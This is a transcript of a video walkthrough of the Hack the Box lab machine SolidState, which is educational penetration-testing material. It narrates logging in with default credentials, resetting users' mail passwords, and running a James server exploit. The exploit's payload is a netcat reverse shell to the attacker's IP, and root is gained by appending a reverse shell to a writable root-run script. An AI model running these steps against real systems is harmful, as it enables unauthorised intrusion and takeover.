In this video, we're gonna be owning another machine from Hack the Box. And this is a retired machine called SolidState. So it's retired as of May 2018. Okay, so SolidState has the IP 10.10.10.51. So proceed, shall we? The first thing that I always do is to run a simple nmap sv 10.10.10.51, after which I run a more thorough scan on all ports with the aggressive level of 5, so the T5 option, and we'll start that right now. So we have a couple of open ports here, and let me just start another nmap sv 10.10.10.51 on all ports and T5 for the level of aggressiveness. So at a first glance, we see that we have James installed, and I'm not actually gonna wait for this this scan on all ports to finish. So I'm gonna tell you that additionally to these open ports, this scan will find another port 4555, so 4555. That's also open on this machine, but it isn't visible on this simple scan. So let's see what we can get on James. So I have a Firefox open up here, and we have this exploit on ExploitDB, remote code execution, and we're going to be looking into this in a moment. So let's open up another terminal, and like I've said, once this thorough scan finishes, we'll see another port here. So I'm actually gonna netcat, not telnet, netcat into 10.10.10.51 on port 4555, which is also opened. And we have a James remote administration tool. So let's try and see if there are some default credentials that we can try. So let's say James administration tool default password. The default login password for the remote manager service is root. Okay, let's try that. So let's say root. Okay, so this is actually quite simple and easy. So we have the root. Let's see what we can do over here. So we have a bunch of commands that we can try. Let's start with list users. So we have a couple of users over here, James, Thomas, Mindy, mail, admin, and if we look into these open ports, we can see that there's also some mail running. So we could, at this point, we could think that if we know the user, any of these user passwords, we could try logging in and see if we can get some important information out of their emails. And that's actually what we will do. So this is how you do it. As we can see, the command here, set password. So we have set password, and we'll say mail admin, and let's say the password is mail admin. Okay, and now we could just log into mail admin with this password. So to save some time, I've changed the password for all of these users, and the important information is found for Mindy. So we'll say set password Mindy, and we'll just say password Mindy. And right now we can just exit, and you would connect to their emails using apps like Thunderbird or any other email client that you can configure for this purpose. So if you don't have Thunderbird, I don't think it's installed by default on Kali. So you would do apt-get install Thunderbird, Thunderbird, but I already have it installed. So I'll just open up a new terminal and open Thunderbird. Okay, and you can see that the scan, the thorough scan, is still running over here. Okay, now let's try to add a new account. So create a new email. Skip this. Okay, so we have Mindy. Let's say Mindy at 10:10:10:51 with the password Mindy. Let's say continue. Let's say done. Understand the risk. Done. Okay, so we have Mindy. Let's get the messages from Mindy's inbox. So we have a welcome. So nothing important here, and your access, which as we can see, we have some SSH credentials to access the system. So user Mindy and password, this password. Okay, now let's try and SSH into this. But first, let's once again look at this exploit. So we have remote code execution for Apache James server. So let's actually try and get this. Copy link location. And over here we can specify a payload which we want to exploit. And you'll see how this works in a minute. So let's just get this one. So wget. Okay, so we have it. And now let's actually edit it. So leave path. And we'll try to set a netcat reverse shell with this exploit. So over here at the payload line, we try to open a netcat session. Netcat -e will open up a bin bash on my IP, which is I guess is 10.10.14.48. Yep. So bin bash at 10.10.14.48 on port, let's say 4449. Keep that in mind, hopefully. Okay, so now let's try run this exploit, Python 355, and it requires the IP address. So our target IP, so we still have the nmap running. So the IP is 10.10.10.51, and let's run it. Okay, so apparently it executed. So payload will be executed once somebody logs in. And this is actually what we're gonna try to do by logging in with Mindy's credentials. So once we log in with Mindy's credentials on SSH, we'll have the payload being executed. So if that happens, we should have a listener waiting on the local host. So the port was 4449. Let me make sure. So cat. So the port that we should be listening on is 4449. Okay. So we're going to be waiting for the connection over here. And as you can see, the thorough scan finished, and we have 4555 open, as I've just said. Okay, now let's log in on the SSH with Mindy. So SSH Mindy at 10.10.10.51, and the password is on Thunderbird. Let's copy paste it. So Control C, and over here Control Shift V, and once I hit enter, we should see an incoming connection over here, the reverse shell. Okay, so now we have the reverse shell. Let's try to make it look better. So we're gonna use Python for that and gonna import a PTI module. So with PTI, we're gonna spawn a bin bash. Okay, and right now we can simply cat the user.txt. So if you log in by default with Mindy, you'll have a restricted bash shell under which you can't do anything. So this is why this exploit, so with that restricted bash shell, with that R bash, you can't even cd out of the directory in which you are in. So that's that shell is kind of completely useful. So the SSH access is I mean not useful but useless, which is why we had to somehow integrate the exploit that we have for the James server. Okay, so once you're inside the server, now the idea is to escalate. And to escalate, the first thing you want to do is probably get as much information as possible from the target. And in this case, we're going to be using lin and num, and we could also use other, so I don't think we're going to be needing this anymore. So there are a couple of tools that you can use for privilege escalation. So there is lin and num.sh. There is also linpriv or Linux priv checker, and there's also, I guess, exploit suggester.sh. Let's just say sh, which is this one. But for the sake of this machine, we're gonna be using lin and num. So let's clear this, make sure that it's over here, and we're gonna start a simple HTTP server on port 80, and we're gonna get the lin and num, we're gonna grab it from Kali. So 1010 1448, that's the route to my Kali through the OpenVPN, and lin enum.sh. Okay, so we got it. We can just quit the Python server. Now, so ls-a. Now let's change mode +x so we can execute the lin enum. And we'll execute it, lin enum.sh, with the -t option, which is a thorough enumeration. And I guess it should be done pretty quickly. Okay, so once this is done, we're actually going to save some time. Instead of actually running through all the output that lin and num got, so the scan is complete, instead of running through all this, which there's a lot of information for sure, but what we are interested in, and the vector, the obvious vector, I mean, it's kind of obvious. The obvious vector is with the use of a file. So let me see if I can get it quickly. Okay, so over here we have files not owned by a user but writable by group. So this file, tmp.py, which is a Python file, is owned by root, but it can be writable by anyone. So let's see what it is about. Let's cd into opt. So we have tmp.py, and this is the vector that I actually use to further exploit or escalate the privileges for this machine. Let's get it, tmp.py. and we can see that it imports the operating system and sys, and it does a try except. And what it actually does is it tries to remove everything or to delete everything from the temp directory, and if it doesn't find anything, it exits. So a pretty basic script, which I kind of don't see the point of it. Probably clearing the temp folder. Other than that, I'm not sure what else could it be. So we could assume that this is executed by root every once in a while, every 1 or 2 or 3 minutes. So if that's the case, we should probably try to write to this file and to write something that could bring us closer to the root. So, or it could help us escalate our privileges. And what we could write using Python is to try to open up or to send us another shell. And in this case, if the script is executed by root, it's gonna send us a reverse shell with root, presumably. So let's see, we'll just append something to the file. So let's say echo os system, and we'll use netcat -e bin bash on our Kali on port 4446. Okay, and we're gonna append it to tmp.py. But before we do that, we should also open up a listener on that port, so 4446. Now let's enter. Let's make sure we have written that to the file, so get tmp.py. So it's in there. So like I've said, if this is run by root, we should probably get a root shell, I don't know, maybe in 1 to 3 minutes, but we'll see. Okay, so while waiting, once again, I'll say that if you're doing these assessments, so if you're working for a company in penetration testing and you're doing penetration testing or cybersecurity assessments, it is always extremely important to write reports of what you're doing. So, okay, so we got the connection as root. But let me finish the idea. So it's always important to write reports for everything you do. And since this machine was pretty easy, the report that I wrote for it is not that lengthy. So it's in info.txt, and I write reports for all the targets that I'm scanning. So let's get info.txt. And as you can see, that there's not much information in here, but if the target is much more difficult to, I don't know, assess, the report is going to be much lengthier. So these reports are very good when you have to present what you've done to the company that you're working for or your contractor. And they are also very useful for you in future assessments if you encounter targets with kind of similar characteristics, or if you want to replicate the same vector of attack on another machine. Anyhow, I digress. So we got the shell back. So the assumption was correct. Root executed tmp.py and it sent us a shell. Let's escape from it. So python -c import pti spawn bin bash. Okay, so we are root, present working directory root, ls -la. So at this point we could simply cat the root.txt, and we have the user flag for solid state, which, as you can see, it wasn't a very difficult machine. The vector was pretty straightforward, so The main theme of this was the vulnerable James server. So if you're running a James server on your system, on your company system, make sure that you have it up to date. And I guess that was it for this video. So if you enjoyed this video and you'd like to see more cybersecurity related videos or videos like this one, please hit the like button and subscribe. And that's all I got for you today. Thanks for watching, and I'll see you in the next one.